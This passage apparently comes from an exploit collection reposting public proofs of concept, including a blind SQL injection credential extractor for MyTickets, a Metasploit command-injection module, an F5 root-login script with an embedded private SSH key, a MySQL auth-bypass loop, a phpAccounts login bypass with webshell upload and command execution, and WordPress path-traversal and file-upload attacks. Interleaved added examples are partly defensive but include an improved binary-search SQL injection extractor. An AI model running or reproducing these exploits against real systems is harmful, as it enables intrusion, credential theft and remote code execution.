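    print("shellcode starts at offset", hunt(image))
```

Keep the doubled tag in mind when the hunter seems to "miss": a single `w00t` (for example the one embedded in the stub's own bytes) is skipped by design, and only the back-to-back pair marks the shellcode.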

  5. MyTickets 1 to 2.0.8 Blind SQL Injection

    <?php
    /*
    ---------------------------------------------------------------
    MyTickets <= 2.0.8 Remote Blind SQL Injection Exploit by al-swisre
    ---------------------------------------------------------------

    author...............: al-swisre
    mail.................: oy3[at]hotmail[dot]com
    software link........: http://phpx3.com/scripts.html#mytickets
    affected versions....: from 1 to 2.0.8


    [-] Vulnerable code in include/system/general/define.php:

    43. if(empty($cookies['language'])){
    44.     setcookie('MyTickets_language',$setting['default_language'],time()+86400,"/");
    45.     $language = $setting['default_language'];
    46. }else{
    47.     if($db->count('languages',"`id`='".$cookies['language']."'") == 0){
    48.         $language = $setting['default_language'];
    49.     }
    50.     $language = $cookies['language'];
    51. }
    52.
    53. $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='".$language."'"));


    */


    print "\n+--------------------------------------------------------------------+";
    print "\n|   MyTickets <= 2.0.8 Remote Blind SQL Injection Exploit by al-swisre |";
    print "\n+--------------------------------------------------------------------+\n";


    if (!extension_loaded('curl')) die("cURL extension required\n");
    error_reporting(E_ERROR);
    set_time_limit(0);


    // Fetch the page with the injection appended to the MyTickets_language cookie
    function get($url,$inj)
    {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 3);
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_COOKIE, "MyTickets_language=1$inj");
        curl_setopt($curl, CURLOPT_HEADER, 1);
        curl_setopt($curl, CURLOPT_VERBOSE, 0);
        $calis = curl_exec($curl);
        curl_close($curl);   // the original closed $calis (the response body) instead of the handle
        return $calis;
    }

    // The injected condition is false when the language lookup returns no row and
    // PHP emits an include() warning; true when the normal page comes back
    function chek_get($connect)
    {
        if (stripos($connect, "include") !== false)   // eregi() was removed in PHP 7
        {
            return false;
        }
        else
        {
            return true;
        }
    }


    if ($argc < 2)
    {
        print "\nUsage......: php $argv[0] <url>\n";
        print "\nExample....: php $argv[0] http://localhost/mytickets/\n";
        die();
    }

    $sql_f = chek_get(get($argv[1],"' and 1='2 /*"));
    $sql_t = chek_get(get($argv[1],"' and 1='1 /*"));


    if($sql_t == $sql_f)
    {
        print "\n\t sorry: magic_quotes_gpc = On ): \n";
        die();
    }

    print "\n\t[+] Getting Admin Username and Password\n\n\t";


    // username:password is read one character at a time; each position is
    // guessed linearly over ASCII 46..122 (up to 77 requests per character)
    for ($g = 1; $g <= 40; $g++) { // edit 40 to the expected length of username:password
        for ($i = 46; $i <= 122; $i++) {

            $inject = chek_get(get($argv[1],"'+AnD+ascii(MiD((sElect+concat_ws(0x3a,username,password)+frOm+members+liMit 0,1),".$g.",1))='".$i."/*"));

            if($inject == true){print chr($i);}
        }
    }


    ?>

    Source: MyTickets 1 to 2.0.8 Blind SQL Injection
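An added example, not the PHP exploit above: the same boolean-based blind extraction the script performs, run against a constructed SQLite stand-in for the vulnerable lookup on define.php line 47 (the cookie value concatenated, unquoted, into the `languages` query), with one change that generalises the script: each byte is found by binary search over its value (8 requests) instead of the script's linear scan over ASCII 46..122. SQLite has no `ascii()`/`mid()`, so the predicate uses `unicode(substr())`, and the trailing quote is commented out with `-- ` instead of `/*`. The `members` row is made-up sample data.

```python
import sqlite3

SECRET = "admin:5f4dcc3b5aa765d61d8327deb882cf99"   # constructed sample, not real credentials


def make_app_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE languages (id INTEGER, name TEXT)")
    db.execute("INSERT INTO languages VALUES (1, 'en')")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.execute("INSERT INTO members VALUES (?, ?)", tuple(SECRET.split(":")))
    return db


def render_language_page(db, cookie_language):
    """Stand-in for define.php: the cookie goes unquoted into the languages
    lookup. No row means the language file include fails and PHP prints a
    warning mentioning 'include', which is the signal the exploit keys on."""
    sql = "SELECT * FROM languages WHERE id='" + cookie_language + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        row = None
    if row is None:
        return "Warning: include(languages/.php): failed to open stream"   # constructed
    return "<html><title>MyTickets</title></html>"


class Oracle:
    """True/false answers read off the page, with a request counter."""
    def __init__(self, db):
        self.db, self.requests = db, 0

    def __call__(self, injection):
        self.requests += 1
        return "include" not in render_language_page(self.db, "1" + injection)


def is_injectable(oracle):
    """The script's magic_quotes test: a true and a false predicate must differ."""
    return oracle("' and '1'='1") and not oracle("' and '1'='2")


def extract(oracle, subquery, max_len=64):
    """Recover the subquery's result byte by byte. Each position costs one
    request to detect the end of the string plus 8 for the binary search."""
    out = []
    for pos in range(1, max_len + 1):
        probe = "unicode(substr((%s),%d,1))" % (subquery, pos)
        if not oracle("' and %s>=1 -- " % probe):
            break                               # substr() past the end gives NULL
        lo, hi = 1, 255
        while lo < hi:                          # find the largest v with byte >= v
            mid = (lo + hi + 1) // 2
            if oracle("' and %s>=%d -- " % (probe, mid)):
                lo = mid
            else:
                hi = mid - 1
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    oracle = Oracle(make_app_db())
    if is_injectable(oracle):
        print(extract(oracle, "select username||':'||password from members limit 1"))
        print("requests:", oracle.requests)
```

Against a real target the same loop goes through `get()` with the injection in the cookie; the only thing that changes is the oracle, the search does not.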

  6. Total Video Player 1.31 .m3u Crash PoC

    # Exploit Title: Total Video Player 1.31 .m3u Crash PoC
    # Date: June 17 2012
    # Exploit Author: 0dem
    # Vendor Homepage: http://www.effectmatrix.com/
    # Software Link: http://download.cnet.com/Total-Video-Player/3000-2139_4-10552696.html
    # Version: V1.31
    # Tested on: Windows XP SP 3
    # Description: Total Video Player does not handle input correctly and will hang
    # when trying to open malformed .m3u files. .mp3 and .avi files are affected too

    # --- m3u -----------------------------------------------
    #!/usr/bin/python
    junk = "#EXTM3U\n"
    junk += "#EXTINF:666, 0dem, 0dem\n"
    junk += "c:\\A"

    file = open("PoC.m3u","w")
    file.writelines(junk)
    file.close()

    # --- mp3 -----------------------------------------------
    #!/usr/bin/python
    junk = "\x41" * 100
    file = open("PoC.mp3","w")
    file.writelines(junk)
    file.close()

    # --- avi -----------------------------------------------
    #!/usr/bin/python
    junk = "\x41" * 100
    file = open("PoC.avi","w")
    file.writelines(junk)
    file.close()

    Source: Total Video Player 1.31 .m3u Crash PoC

  7. OpenType Font File Format DoS Exploit for Windows

    ************************************************************************

    OpenType font file format remote (client-side) DoS exploit for Windows

    By Oleksiuk Dmytro (aka Cr4sh)
    http://twitter.com/d_olex
    http://blog.cr4.sh
    mailto:cr4sh0@gmail.com

    ************************************************************************

    INFO:

    A zero-day vulnerability exists in the kernel-mode library ATMFD.DLL, which the OS uses to work with PostScript-based OpenType font files (.OTF).

    Vulnerable versions of Windows/ATMFD.DLL: all, x32 and x64.

    Opening a malicious .OTF font file, which can be embedded in a Microsoft Office document or web page, causes a BSoD on NT 5.x (Windows XP, Server 2003) and 100% CPU usage on NT 6.x (Vista, 7, Server 2008).

    To trigger the vulnerability, double-click on CFF_Type-1_0x0d_expl.otf

    The point of the vulnerability: invalid decoding of the 0x0d byte in a Type 2 Charstring Format glyph, which drops the ATMFD.DLL code into an infinite loop.

    "good" glyph representation:

    [68]={
    95 112 99 65 61 vhcurveto
    endchar
    }

    Malicious glyph representation:

    [68]={
    95 112 99 65 reserved13
    vhcurveto
    endchar
    }

    This vulnerability was found with the MsFontsFuzz fuzzer, which can be downloaded from https://github.com/Cr4sh/MsFontsFuzz

    A more detailed vulnerability analysis can be found at http://blog.cr4.sh/2012/06/0day-windows.html (Russian, use Google Translate).

    ====
    POC
    ====

    http://www.exploit-db.com/sploits/19089.rar

    Source: OpenType Font File Format DoS Exploit for Windows
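An added example, not from the advisory and not the ATMFD.DLL code: a minimal Type 2 charstring encoder and a decoder that refuses the reserved operator 13 instead of misdecoding it, used to build the "good" and malicious glyph programs quoted above from their textual form. It handles the integer operand encodings and the one-byte operators only; two-byte escape operators and the mask bytes that follow `hintmask`/`cntrmask` are outside what this illustration needs.

```python
# One-byte Type 2 charstring operators (CFF specification, appendix A)
OPERATORS = {
    1: "hstem", 3: "vstem", 4: "vmoveto", 5: "rlineto", 6: "hlineto", 7: "vlineto",
    8: "rrcurveto", 10: "callsubr", 11: "return", 14: "endchar", 18: "hstemhm",
    19: "hintmask", 20: "cntrmask", 21: "rmoveto", 22: "hmoveto", 23: "vstemhm",
    24: "rcurveline", 25: "rlinecurve", 26: "vvcurveto", 27: "hhcurveto",
    29: "callgsubr", 30: "vhcurveto", 31: "hvcurveto",
}
RESERVED = {0, 2, 9, 13, 15, 16, 17}        # one-byte operator values with no meaning
NAMES = {name: op for op, name in OPERATORS.items()}


def encode_number(n):
    """Type 2 integer operand encoding (the 16.16 fixed form is not emitted)."""
    if -107 <= n <= 107:
        return bytes([n + 139])
    if 108 <= n <= 1131:
        n -= 108
        return bytes([(n >> 8) + 247, n & 0xFF])
    if -1131 <= n <= -108:
        n = -n - 108
        return bytes([(n >> 8) + 251, n & 0xFF])
    if -32768 <= n <= 32767:
        return b"\x1c" + n.to_bytes(2, "big", signed=True)
    raise ValueError("operand out of range: %d" % n)


def encode_charstring(tokens):
    """tokens: ints and operator names, e.g. [95, 112, 99, 65, 61, "vhcurveto", "endchar"].
    'reservedN' emits the raw operator byte N, which is how the malicious glyph is built."""
    out = bytearray()
    for t in tokens:
        if isinstance(t, int):
            out += encode_number(t)
        elif t.startswith("reserved"):
            out.append(int(t[len("reserved"):]))
        else:
            out.append(NAMES[t])
    return bytes(out)


def parse_charstring(data):
    """Decode to a list of (operands, operator). Unlike the vulnerable decoder
    this stops on a reserved operator instead of trying to interpret it."""
    ops, stack, i = [], [], 0
    while i < len(data):
        b = data[i]
        if b == 28:
            stack.append(int.from_bytes(data[i + 1:i + 3], "big", signed=True)); i += 3
        elif 32 <= b <= 246:
            stack.append(b - 139); i += 1
        elif 247 <= b <= 250:
            stack.append((b - 247) * 256 + data[i + 1] + 108); i += 2
        elif 251 <= b <= 254:
            stack.append(-(b - 251) * 256 - data[i + 1] - 108); i += 2
        elif b == 255:
            stack.append(int.from_bytes(data[i + 1:i + 5], "big", signed=True) / 65536); i += 5
        elif b == 12:
            raise ValueError("two-byte (escape) operators are not handled in this example")
        elif b in RESERVED:
            raise ValueError("reserved operator %d at offset %d" % (b, i))
        else:
            ops.append((stack, OPERATORS[b])); stack = []; i += 1
            if b == 14:                      # endchar ends the program
                break
    return ops


def is_well_formed(data):
    try:
        parse_charstring(data)
        return True
    except (ValueError, KeyError, IndexError):
        return False


GOOD_GLYPH = encode_charstring([95, 112, 99, 65, 61, "vhcurveto", "endchar"])
BAD_GLYPH  = encode_charstring([95, 112, 99, 65, "reserved13", "vhcurveto", "endchar"])

if __name__ == "__main__":
    print("good:", GOOD_GLYPH.hex(), parse_charstring(GOOD_GLYPH))
    print("bad: ", BAD_GLYPH.hex(), "well-formed:", is_well_formed(BAD_GLYPH))
```

Note how small the difference between the two programs is: one operand byte (`61` encodes as `0xC8`) replaced by the raw operator byte `0x0D`. A decoder that treats unknown operators as "skip and continue" can loop on such input; rejecting reserved values up front is the cheap fix.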

  8. Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      def initialize(info={})
        super(update_info(info,
          'Name'        => "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",
          'Description' => %q{
            This module exploits a command injection vulnerability found in Symantec Web
            Gateway's HTTP service due to the insecure usage of the exec() function. This module
            abuses the spywall/ipchange.php file to execute arbitrary OS commands without
            authentication.
          },
          'License'     => MSF_LICENSE,
          'Author'      =>
            [
              'Tenable Network Security', # Vulnerability Discovery
              'juan vazquez'              # Metasploit module
            ],
          'References'  =>
            [
              [ 'CVE', '2012-0297' ],
              [ 'BID', '53444' ],
              [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],
              [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
            ],
          'Payload'     =>
            {
              'BadChars' => "\x00\x0d\x0a\x26",
              'Compat'   =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'generic perl',
                }
            },
          'Platform'    => ['unix'],
          'Arch'        => ARCH_CMD,
          'Targets'     =>
            [
              ['Symantec Web Gateway 5.0.2.8', {}],
            ],
          'Privileged'  => false,
          'DisclosureDate' => "May 17 2012",
          'DefaultTarget'  => 0))
      end


      def check
        res = send_request_raw({
          'method' => 'GET',
          'uri'    => '/spywall/login.php'
        })

        if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
          return Exploit::CheckCode::Detected
        else
          return Exploit::CheckCode::Safe
        end
      end

      def exploit
        uri = target_uri.path
        uri << '/' if uri[-1,1] != '/'

        peer = "#{rhost}:#{rport}"

        # The subnet value is closed off with '";', our command follows, and '#'
        # comments out whatever the script appends after it
        post_data = "subnet="
        post_data << "\";" + payload.raw + ";#"

        print_status("#{peer} - Sending Command injection")
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => "#{uri}spywall/ipchange.php",
          'data'   => post_data
        })

        # If the server doesn't return the default redirection, probably
        # something is wrong
        if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/
          print_error("#{peer} - Probably command not executed, aborting!")
          return
        end

      end


    end

    Source: Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
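An added example, not from the module and not Symantec's code: the PHP source of ipchange.php is not on the page, so the command template below is a hypothetical stand-in for a shell line built by concatenation. It shows how the `";<cmd>;#` value the module POSTs splits that line into two commands, and how quoting the value (`escapeshellarg()` in PHP, `shlex.quote()` here) keeps it as one. Python's `shlex` is used only to show where a POSIX shell would split; nothing is executed.

```python
import shlex

# Hypothetical command template, not the one in ipchange.php
TEMPLATE = 'sh /tmp/set_subnet.sh "{subnet}"'

BAD_CHARS = b"\x00\x0d\x0a\x26"   # the module's BadChars: NUL, CR, LF and '&'


def build_post_data(cmd):
    """What the module sends: subnet=";<cmd>;#  (raw in the POST body, so an
    '&' in cmd would start a new form field and a newline would end the line)."""
    if any(ch in cmd.encode() for ch in BAD_CHARS):
        raise ValueError("command contains a bad char")
    return 'subnet=";' + cmd + ';#'


def vulnerable_line(subnet):
    """Concatenation as the page describes: the value lands inside double quotes."""
    return TEMPLATE.format(subnet=subnet)


def fixed_line(subnet):
    """The value is single-quoted as one argument; embedded quotes are escaped."""
    return "sh /tmp/set_subnet.sh " + shlex.quote(subnet)


def shell_commands(line):
    """Split a shell line the way the shell would, returning one argv per ';'.
    '#' starts a comment, so everything after it is dropped."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def injected_commands(line):
    """Everything the shell would run beyond the first, intended command."""
    return shell_commands(line)[1:]


if __name__ == "__main__":
    value = build_post_data("id").split("=", 1)[1]
    print("vulnerable:", shell_commands(vulnerable_line(value)))
    print("fixed:     ", shell_commands(fixed_line(value)))
```

The `BadChars` list in the module follows from the same picture: `&` would break the POST field apart before the shell ever sees it, and CR/LF would end the command line early.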

  9. F5 BIG-IP Remote Root Authentication Bypass Vulnerability

    #!/usr/bin/python
    #
    # Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
    #
    # Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
    # http://www.secmaniac.com
    #
    #
    import subprocess,os

    filewrite = file("priv.key", "w")
    filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
    MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
    UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
    OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
    gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
    8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
    7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
    2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
    37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
    RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
    rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
    uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
    Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
    LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
    -----END RSA PRIVATE KEY-----""")
    filewrite.close()
    subprocess.Popen("chmod 700 priv.key", shell=True).wait()

    ipaddr=raw_input("Enter the IP address of the F5: ")
    subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()

    if os.path.isfile("priv.key"):
        os.remove("priv.key")

    Source: F5 BIG-IP Remote Root Authentication Bypass Vulnerability
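An added example, not Dave Kennedy's script: the defensive counterpart. It derives the OpenSSH public key line and SHA256 fingerprint from the leaked private key above using only the standard library (a minimal DER walk over the PKCS#1 RSAPrivateKey structure reads the modulus and public exponent), so `authorized_keys` files and SSH logs can be searched for it. The `authorized_keys` sample at the bottom is constructed.

```python
import base64
import hashlib
import struct

# The private key from the script above (public material only is derived from it)
LEAKED_PEM = """-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----"""


def der_read(buf, pos):
    """Read one DER TLV at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                         # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def rsa_public_numbers(pem):
    """(n, e) from a PKCS#1 'RSA PRIVATE KEY' PEM: SEQUENCE { version, n, e, ... }."""
    b64 = "".join(l for l in pem.strip().splitlines() if not l.startswith("-----"))
    tag, body, _ = der_read(base64.b64decode(b64), 0)
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    pos, ints = 0, []
    for _ in range(3):                        # version, modulus, publicExponent
        tag, val, pos = der_read(body, pos)
        if tag != 0x02:
            raise ValueError("expected INTEGER")
        ints.append(int.from_bytes(val, "big"))
    return ints[1], ints[2]


def ssh_mpint(x):
    b = x.to_bytes((x.bit_length() + 7) // 8, "big")
    if b[0] & 0x80:
        b = b"\x00" + b                       # keep it positive
    return struct.pack(">I", len(b)) + b


def openssh_public_key(n, e):
    blob = struct.pack(">I", 7) + b"ssh-rsa" + ssh_mpint(e) + ssh_mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode()


def fingerprint_sha256(pubkey_line):
    """Same format ssh-keygen -lf prints: SHA256:<unpadded base64>."""
    blob = base64.b64decode(pubkey_line.split()[1])
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def find_leaked_key(authorized_keys_text, pubkey_line):
    """1-based line numbers whose key blob equals the leaked key's, whatever the
    options prefix or comment around it."""
    blob = pubkey_line.split()[1]
    return [i for i, line in enumerate(authorized_keys_text.splitlines(), 1)
            if blob in line.split()]


LEAKED_PUBKEY = openssh_public_key(*rsa_public_numbers(LEAKED_PEM))

# constructed authorized_keys content; the first and third entries are not real keys
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC7dW5yZWxhdGVkIGtleQ== ops@jump",
    'command="/bin/true" ' + LEAKED_PUBKEY + " root@example",
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHd1bW15 admin@laptop",
])

if __name__ == "__main__":
    print(LEAKED_PUBKEY)
    print(fingerprint_sha256(LEAKED_PUBKEY))
    print("matches on lines:", find_leaked_key(SAMPLE_AUTHORIZED_KEYS, LEAKED_PUBKEY))
```

The public key line is what belongs in a blocklist or a detection rule, not the private key: it is safe to distribute, and it is exactly what appears in `authorized_keys` and in `sshd`'s "Accepted publickey" log lines once fingerprints are logged.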

  10. MySQL Remote Root Authentication Bypass

    #!/usr/bin/python
    #
    #
    # This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
    #
    # Title: MySQL Remote Root Authentication Bypass
    # Written by: Dave Kennedy (ReL1K)
    # http://www.secmaniac.com
    #
    # Original advisory here: seclists.org/oss-sec/2012/q2/493
    import subprocess

    ipaddr = raw_input("Enter the IP address of the mysql server: ")

    while 1:
        subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()

    Source: MySQL Remote Root Authentication Bypass
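An added example, not the script above: why looping on a wrong password eventually gets in on an affected build, following the oss-sec advisory the script links. On those builds the server stored `memcmp()`'s `int` result in a one-byte `my_bool` and treated zero as "passwords match", so any comparison result that is a multiple of 256 passes. The "server" below is a constructed stand-in whose `memcmp()` returns arbitrary differences (as SSE-optimised glibc builds did) rather than only -1, 0 or 1; no MySQL client is involved.

```python
import random


def scramble_accepted(memcmp_result):
    """check_scramble() on an affected build: the int from memcmp() is stored
    in a signed char, and the caller takes 0 to mean the scramble matched.
    Anything congruent to 0 mod 256 therefore passes, wrong password or not."""
    truncated = ((memcmp_result + 128) % 256) - 128       # (signed char) cast
    return truncated == 0


def nonzero_results_that_pass(lo=-32768, hi=32767):
    """Every non-zero memcmp() value in [lo, hi] the truncation turns into 0."""
    return [v for v in range(lo, hi + 1) if v != 0 and scramble_accepted(v)]


def make_fake_server(seed=2012):
    """Constructed stand-in: a wrong-password attempt against a server whose
    memcmp() returns an arbitrary difference instead of just -1/0/1."""
    rng = random.Random(seed)

    def wrong_password_attempt():
        return scramble_accepted(rng.randint(-32768, 32767))

    return wrong_password_attempt


def retry_until_in(attempt, max_tries=100000):
    """The script's `while 1` loop with a counter: number of attempts until
    one succeeds, or None. With p = 1/256 per try the expectation is ~256."""
    for n in range(1, max_tries + 1):
        if attempt():
            return n
    return None


if __name__ == "__main__":
    print("non-zero results that pass in a 16-bit range:", len(nonzero_results_that_pass()))
    print("logged in after", retry_until_in(make_fake_server()), "attempts")
```

The defensive reading is the same number: a burst of a few hundred failed `root` logins from one address followed by a success, with no password change in between, is the signature of this bypass in the server's logs.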

  11. phpAcounts v.0.5.3 SQL Injection

    ######################################################################################
    # Exploit phpAcounts v.0.5.3 SQL Injection
    # Date: June 6nd 2012
    # Author: loneferret
    # Version: 0.5.3
    # Vendor Url: http://phpaccounts.com/
    # Tested on: Ubuntu Server 11.10
    ######################################################################################
    # Discovered by: loneferret
    ######################################################################################

    # Old app, still fun.

    Auth. Bypass:
    http://<server>/phpaccounts/index.php
    Username: x' or '1'='1'#
    Password: <whatever>

    Upload php shell in preferences
    Letterhead image upload does not sanitize file extensions.
    http://server/index.php?page=tasks&action=preferences

    Access shell:
    Where '1' is the user's ID.
    http://server/phpaccounts/users/1/<filename>



    ---- Python PoC ---------

    #!/usr/bin/python

    import re, mechanize
    import urllib, sys

    print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
    print "[*] Vulnerability discovered by loneferret"

    print "[*] Offensive Security - http://www.offensive-security.com\n"
    if (len(sys.argv) != 3):
        print "[*] Usage: poc.py <RHOST> <RCMD>"
        exit(0)

    rhost = sys.argv[1]
    rcmd = sys.argv[2]


    print "[*] Bypassing Login ."
    try:
        br = mechanize.Browser()
        br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
        assert br.viewing_html()
        br.select_form(name="loginForm")
        br.select_form(nr=0)
        br.form['Login_Username'] = "x' or '1'#"
        br.form['Login_Password'] = "pwnd"
        print "[*] Triggering SQLi .."
        br.submit()
    except:
        print "[*] Oups..Something happened"
        exit(0)

    print "[*] Uploading Shell ..."
    try:
        br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
        assert br.viewing_html()
        br.select_form(nr=0)
        br.form["Preferences[LETTER_HEADER]"] = 'test'
        # backdoor.php must exist in the current directory; it goes up as the letterhead image
        br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
        br.submit(nr=2)
    except:
        print "[*] Upload didn't work"
        exit(0)

    print "[*] Command Executed\n"
    try:
        shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
        print shell.read()
    except:
        print "[*] Oups."
        exit(0)

    Source: phpAcounts v.0.5.3 SQL Injection

  12. Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability

    ##################################################
    # Description : Wordpress Plugins - Plugin: Newsletter Remote File Disclosure Vulnerability
    # Version : 1.5
    # Link : http://wordpress.org/extend/plugins/plugin-newsletter/
    # Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip
    # Date : 31-05-2012
    # Google Dork : inurl:/wp-content/plugins/plugin-newsletter/
    # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
    ##################################################


    Exploit :

    http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php

    Read source [CTRL-u]

    http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwd

    Read source [CTRL-u]

    Source: Wordpress Plugin: Newsletter 1.5 Remote File Disclosure Vulnerability

  13. Wordpress RBX Gallery Plugin 2.1 Arbitrary File Upload

    ##################################################
    # Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File Upload Vulnerability
    # Version : 2.1
    # Link : http://wordpress.org/extend/plugins/rbxgallery/
    # Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip
    # Date : 03-06-2012
    # Google Dork : inurl:/wp-content/plugins/rbxgallery/
    # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
    ##################################################


    Exploit :

    PostShell.php
    <?php

    $uploadfile="lo.php";
    $uploadfile2="db.php";
    $ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('images[0]'=>"@$uploadfile",
              'images[1]'=>"@$uploadfile2",
              'Submit'=>'submit'));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";

    ?>

    Shell Access :
    http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php
    http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php

    lo.php
    <?php
    phpinfo();
    ?>

    Source: Wordpress RBX Gallery Plugin 2.1 Arbitrary File Upload
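    Added example, not code from any of the plugins or advisories: the upload handling that the phpAccounts letterhead, RBX Gallery uploader.php and PHPNet article-upload posts all get wrong, beside a validator that rejects the same uploads. It is Python rather than the PHP the applications use; the magic-byte table, the filename rule and the sample files are constructed for the demonstration.

```python
import os
import re
import secrets

# Allow-list: extension -> magic bytes the file body must begin with.
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
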